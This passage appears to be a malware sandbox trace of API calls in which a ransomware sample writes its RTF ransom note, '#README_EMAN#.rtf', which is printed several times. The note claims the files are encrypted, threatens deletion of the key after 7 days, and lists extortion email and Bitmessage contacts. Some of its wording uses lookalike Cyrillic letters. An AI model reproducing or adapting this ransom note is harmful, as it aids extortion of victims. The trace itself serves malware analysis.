fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.086] WriteFile (in: hFile=0x294, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.087] CloseHandle (hObject=0x294) returned 1 [0269.087] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\#readme_eman#.rtf")) returned 0xffffffff [0269.087] GetLastError () returned 0x2 [0269.087] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 